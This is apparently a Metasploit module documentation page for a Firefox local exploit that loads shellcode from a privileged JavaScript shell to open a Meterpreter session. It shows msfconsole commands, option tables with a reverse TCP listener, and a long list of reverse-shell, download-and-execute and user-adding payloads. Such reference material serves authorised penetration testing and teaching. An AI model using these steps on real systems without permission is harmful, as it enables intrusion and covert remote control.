Firefox Exec Shellcode from Privileged Javascript Shell - Metasploit
This page contains detailed information about how to use the exploit/firefox/local/exec_shellcode metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Firefox Exec Shellcode from Privileged Javascript Shell
Module: exploit/firefox/local/exec_shellcode
Source code: modules/exploits/firefox/local/exec_shellcode.rb
Disclosure date: 2014-03-10
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): -
Supported platform(s): Firefox
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module allows execution of native payloads from a privileged Firefox Javascript shell. It places the specified payload into memory, adds the necessary protection flags, and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter session without touching the disk.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/firefox/local/exec_shellcode
msf exploit(exec_shellcode) > show targets
... a list of targets ...
msf exploit(exec_shellcode) > set TARGET target-id
msf exploit(exec_shellcode) > show options
... show and set options ...
msf exploit(exec_shellcode) > set SESSION session-id
msf exploit(exec_shellcode) > exploit
Required Options
- SESSION: The session to run this module on.
Go back to menu.
Msfconsole Usage
Here is how the firefox/local/exec_shellcode exploit module looks in the msfconsole:
msf6 > use exploit/firefox/local/exec_shellcode
[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp
msf6 exploit(firefox/local/exec_shellcode) > show info
Name: Firefox Exec Shellcode from Privileged Javascript Shell
Module: exploit/firefox/local/exec_shellcode
Platform: Firefox
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2014-03-10
Provided by:
joev <[email protected]>
Available targets:
Id Name
-- ----
0 Native Payload
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
TIMEOUT 90 yes Maximum time (seconds) to wait for a response
Payload information:
Description:
This module allows execution of native payloads from a privileged
Firefox Javascript shell. It places the specified payload into
memory, adds the necessary protection flags, and calls it, which can
be useful for upgrading a Firefox javascript shell to a Meterpreter
session without touching the disk.
Module Options
This is a complete list of options available in the firefox/local/exec_shellcode exploit:
msf6 exploit(firefox/local/exec_shellcode) > show options
Module options (exploit/firefox/local/exec_shellcode):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
TIMEOUT 90 yes Maximum time (seconds) to wait for a response
Payload options (linux/aarch64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Native Payload
Advanced Options
Here is a complete list of advanced options supported by the firefox/local/exec_shellcode exploit:
msf6 exploit(firefox/local/exec_shellcode) > show advanced
Module advanced options (exploit/firefox/local/exec_shellcode):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
JsIdentifiers no Identifiers to preserve for JsObfu
JsObfuscate 0 no Number of times to obfuscate JavaScript
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (linux/aarch64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the firefox/local/exec_shellcode module can exploit:
msf6 exploit(firefox/local/exec_shellcode) > show targets
Exploit targets:
Id Name
-- ----
0 Native Payload
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the firefox/local/exec_shellcode exploit:
msf6 exploit(firefox/local/exec_shellcode) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 payload/cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 payload/cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
3 payload/cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
4 payload/cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
5 payload/cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
6 payload/cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
7 payload/cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs)
8 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
9 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
10 payload/cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
11 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
12 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
13 payload/cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
14 payload/cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub)
15 payload/cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
16 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
17 payload/cmd/unix/pingback_bind normal No Unix Command Shell, Pingback Bind TCP (via netcat)
18 payload/cmd/unix/pingback_reverse normal No Unix Command Shell, Pingback Reverse TCP (via netcat)
19 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
20 payload/cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
21 payload/cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
22 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
23 payload/cmd/unix/reverse_bash_udp normal No Unix Command Shell, Reverse UDP (/dev/udp)
24 payload/cmd/unix/reverse_jjs normal No Unix Command Shell, Reverse TCP (via jjs)
25 payload/cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
26 payload/cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
27 payload/cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
28 payload/cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
29 payload/cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
30 payload/cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs)
31 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
32 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
33 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
34 payload/cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
35 payload/cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
36 payload/cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
37 payload/cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
38 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
39 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
40 payload/cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
41 payload/cmd/unix/reverse_ssh normal No Unix Command Shell, Reverse TCP SSH
42 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
43 payload/cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub)
44 payload/cmd/unix/reverse_tclsh normal No Unix Command Shell, Reverse TCP (via Tclsh)
45 payload/cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
46 payload/cmd/windows/adduser normal No Windows Execute net user /ADD CMD
47 payload/cmd/windows/bind_lua normal No Windows Command Shell, Bind TCP (via Lua)
48 payload/cmd/windows/bind_perl normal No Windows Command Shell, Bind TCP (via Perl)
49 payload/cmd/windows/bind_perl_ipv6 normal No Windows Command Shell, Bind TCP (via perl) IPv6
50 payload/cmd/windows/bind_ruby normal No Windows Command Shell, Bind TCP (via Ruby)
51 payload/cmd/windows/download_eval_vbs normal No Windows Executable Download and Evaluate VBS
52 payload/cmd/windows/download_exec_vbs normal No Windows Executable Download and Execute (via .vbs)
53 payload/cmd/windows/generic normal No Windows Command, Generic Command Execution
54 payload/cmd/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
55 payload/cmd/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
56 payload/cmd/windows/reverse_lua normal No Windows Command Shell, Reverse TCP (via Lua)
57 payload/cmd/windows/reverse_perl normal No Windows Command, Double Reverse TCP Connection (via Perl)
58 payload/cmd/windows/reverse_powershell normal No Windows Command Shell, Reverse TCP (via Powershell)
59 payload/cmd/windows/reverse_ruby normal No Windows Command Shell, Reverse TCP (via Ruby)
60 payload/generic/custom normal No Custom Payload
61 payload/generic/debug_trap normal No Generic x86 Debug Trap
62 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
63 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
64 payload/generic/tight_loop normal No Generic x86 Tight Loop
65 payload/java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline
66 payload/java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline
67 payload/linux/aarch64/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager
68 payload/linux/aarch64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
69 payload/linux/aarch64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
70 payload/linux/aarch64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
71 payload/linux/aarch64/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager
72 payload/linux/aarch64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
73 payload/linux/armbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
74 payload/linux/armbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
75 payload/linux/armbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
76 payload/linux/armbe/shell_bind_tcp normal No Linux ARM Big Endian Command Shell, Bind TCP Inline
77 payload/linux/armle/exec normal No Linux Execute Command
78 payload/linux/armle/meterpreter/bind_tcp normal No Linux Meterpreter, Bind TCP Stager
79 payload/linux/armle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager
80 payload/linux/armle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
81 payload/linux/armle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
82 payload/linux/armle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
83 payload/linux/armle/shell/bind_tcp normal No Linux dup2 Command Shell, Bind TCP Stager
84 payload/linux/armle/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager
85 payload/linux/armle/shell_bind_tcp normal No Linux Command Shell, Reverse TCP Inline
86 payload/linux/armle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
87 payload/linux/mips64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
88 payload/linux/mips64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
89 payload/linux/mips64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
90 payload/linux/mipsbe/exec normal No Linux Execute Command
91 payload/linux/mipsbe/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager
92 payload/linux/mipsbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
93 payload/linux/mipsbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
94 payload/linux/mipsbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
95 payload/linux/mipsbe/reboot normal No Linux Reboot
96 payload/linux/mipsbe/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
97 payload/linux/mipsbe/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
98 payload/linux/mipsbe/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
99 payload/linux/mipsle/exec normal No Linux Execute Command
100 payload/linux/mipsle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager
101 payload/linux/mipsle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
102 payload/linux/mipsle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
103 payload/linux/mipsle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
104 payload/linux/mipsle/reboot normal No Linux Reboot
105 payload/linux/mipsle/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
106 payload/linux/mipsle/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
107 payload/linux/mipsle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
108 payload/linux/ppc/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
109 payload/linux/ppc/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
110 payload/linux/ppc/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
111 payload/linux/ppc/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
112 payload/linux/ppc/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
113 payload/linux/ppc64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
114 payload/linux/ppc64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
115 payload/linux/ppc64le/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
116 payload/linux/ppc64le/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
117 payload/linux/ppc64le/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
118 payload/linux/ppce500v2/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
119 payload/linux/ppce500v2/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
120 payload/linux/ppce500v2/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
121 payload/linux/x64/exec normal No Linux Execute Command
122 payload/linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager
123 payload/linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager
124 payload/linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
125 payload/linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
126 payload/linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
127 payload/linux/x64/pingback_bind_tcp normal No Linux x64 Pingback, Bind TCP Inline
128 payload/linux/x64/pingback_reverse_tcp normal No Linux x64 Pingback, Reverse TCP Inline
129 payload/linux/x64/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager
130 payload/linux/x64/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
131 payload/linux/x64/shell_bind_ipv6_tcp normal No Linux x64 Command Shell, Bind TCP Inline (IPv6)
132 payload/linux/x64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
133 payload/linux/x64/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
134 payload/linux/x64/shell_reverse_ipv6_tcp normal No Linux x64 Command Shell, Reverse TCP Inline (IPv6)
135 payload/linux/x64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
136 payload/linux/x86/chmod normal No Linux Chmod
137 payload/linux/x86/exec normal No Linux Execute Command
138 payload/linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
139 payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
140 payload/linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
141 payload/linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
142 payload/linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
143 payload/linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6)
144 payload/linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager
145 payload/linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager
146 payload/linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager
147 payload/linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
148 payload/linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
149 payload/linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
150 payload/linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP
151 payload/linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline
152 payload/linux/x86/read_file normal No Linux Read File
153 payload/linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
154 payload/linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
155 payload/linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager
156 payload/linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86)
157 payload/linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
158 payload/linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6)
159 payload/linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager
160 payload/linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
161 payload/linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager
162 payload/linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6)
163 payload/linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
164 payload/linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
165 payload/linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
166 payload/linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6)
167 payload/linux/zarch/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
168 payload/linux/zarch/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
169 payload/linux/zarch/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
170 payload/osx/armle/execute/bind_tcp normal No OS X Write and Execute Binary, Bind TCP Stager
171 payload/osx/armle/execute/reverse_tcp normal No OS X Write and Execute Binary, Reverse TCP Stager
172 payload/osx/armle/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager
173 payload/osx/armle/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager
174 payload/osx/armle/shell_bind_tcp normal No Apple iOS Command Shell, Bind TCP Inline
175 payload/osx/armle/shell_reverse_tcp normal No Apple iOS Command Shell, Reverse TCP Inline
176 payload/osx/armle/vibrate normal No Apple iOS iPhone Vibrate
177 payload/osx/ppc/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager
178 payload/osx/ppc/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager
179 payload/osx/ppc/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline
180 payload/osx/ppc/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline
181 payload/osx/x64/dupandexecve/bind_tcp normal No OS X dup2 Command Shell, Bind TCP Stager
182 payload/osx/x64/dupandexecve/reverse_tcp normal No OS X dup2 Command Shell, Reverse TCP Stager
183 payload/osx/x64/dupandexecve/reverse_tcp_uuid normal No OS X dup2 Command Shell, Reverse TCP Stager with UUID Support (OSX x64)
184 payload/osx/x64/exec normal No OS X x64 Execute Command
185 payload/osx/x64/meterpreter/bind_tcp normal No OSX Meterpreter, Bind TCP Stager
186 payload/osx/x64/meterpreter/reverse_tcp normal No OSX Meterpreter, Reverse TCP Stager
187 payload/osx/x64/meterpreter/reverse_tcp_uuid normal No OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)
188 payload/osx/x64/meterpreter_reverse_http normal No OSX Meterpreter, Reverse HTTP Inline
189 payload/osx/x64/meterpreter_reverse_https normal No OSX Meterpreter, Reverse HTTPS Inline
190 payload/osx/x64/meterpreter_reverse_tcp normal No OSX Meterpreter, Reverse TCP Inline
191 payload/osx/x64/say normal No OS X x64 say Shellcode
192 payload/osx/x64/shell_bind_tcp normal No OS X x64 Shell Bind TCP
193 payload/osx/x64/shell_reverse_tcp normal No OS X x64 Shell Reverse TCP
194 payload/osx/x86/bundleinject/bind_tcp normal No Mac OS X Inject Mach-O Bundle, Bind TCP Stager
195 payload/osx/x86/bundleinject/reverse_tcp normal No Mac OS X Inject Mach-O Bundle, Reverse TCP Stager
196 payload/osx/x86/exec normal No OS X Execute Command
197 payload/osx/x86/isight/bind_tcp normal No Mac OS X x86 iSight Photo Capture, Bind TCP Stager
198 payload/osx/x86/isight/reverse_tcp normal No Mac OS X x86 iSight Photo Capture, Reverse TCP Stager
199 payload/osx/x86/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline
200 payload/osx/x86/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline
201 payload/osx/x86/vforkshell/bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Stager
202 payload/osx/x86/vforkshell/reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Stager
203 payload/osx/x86/vforkshell_bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Inline
204 payload/osx/x86/vforkshell_reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Inline
205 payload/tty/unix/interact normal No Unix TTY, Interact with Established Connection
206 payload/windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
207 payload/windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager
208 payload/windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
209 payload/windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
210 payload/windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
211 payload/windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
212 payload/windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86)
213 payload/windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
214 payload/windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
215 payload/windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
216 payload/windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
217 payload/windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy
218 payload/windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6)
219 payload/windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
220 payload/windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
221 payload/windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager
222 payload/windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager
223 payload/windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS)
224 payload/windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
225 payload/windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
226 payload/windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support
227 payload/windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
228 payload/windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution
229 payload/windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute
230 payload/windows/exec normal No Windows Execute Command
231 payload/windows/loadlibrary normal No Windows LoadLibrary Path
232 payload/windows/messagebox normal No Windows MessageBox
233 payload/windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
234 payload/windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
235 payload/windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
236 payload/windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
237 payload/windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
238 payload/windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
239 payload/windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
240 payload/windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
241 payload/windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
242 payload/windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
243 payload/windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
244 payload/windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
245 payload/windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
246 payload/windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
247 payload/windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
248 payload/windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
